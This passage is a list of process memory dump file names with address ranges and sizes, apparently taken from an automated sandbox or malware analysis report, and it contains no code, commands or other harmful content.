memory/5552-375-0x0000000000000000-mapping.dmp
-
memory/5660-377-0x0000000000000000-mapping.dmp
-
memory/5804-337-0x0000000000000000-mapping.dmp
-
memory/5816-338-0x0000000000000000-mapping.dmp
-
memory/5816-340-0x0000000000F70000-0x0000000000F71000-memory.dmpFilesize
4KB
-
memory/5816-370-0x0000000005A40000-0x0000000005A41000-memory.dmpFilesize
4KB
-
memory/5864-339-0x0000000000000000-mapping.dmp
-
memory/5896-341-0x0000000000000000-mapping.dmp
-
memory/5944-343-0x0000000000000000-mapping.dmp
-
memory/5964-349-0x0000000000000000-mapping.dmp
-
memory/5984-345-0x0000000000000000-mapping.dmp
-
memory/6028-510-0x00007FFCE06F0000-0x00007FFCE06F2000-memory.dmpFilesize
8KB
-
memory/6048-350-0x0000000000000000-mapping.dmp
-
memory/6252-407-0x0000000000850000-0x0000000000860000-memory.dmpFilesize
64KB
-
memory/6252-600-0x0000000000860000-0x0000000000861000-memory.dmpFilesize
4KB
-
memory/6464-415-0x0000000002000000-0x0000000002010000-memory.dmpFilesize
64KB
-
memory/6564-430-0x000000001B740000-0x000000001B742000-memory.dmpFilesize
8KB
-
memory/6580-441-0x000000001B0F0000-0x000000001B0F2000-memory.dmpFilesize
8KB
-
memory/6656-594-0x0000000005640000-0x0000000005641000-memory.dmpFilesize
4KB
-
memory/7040-471-0x000000001AFF0000-0x000000001AFF2000-memory.dmpFilesize
8KB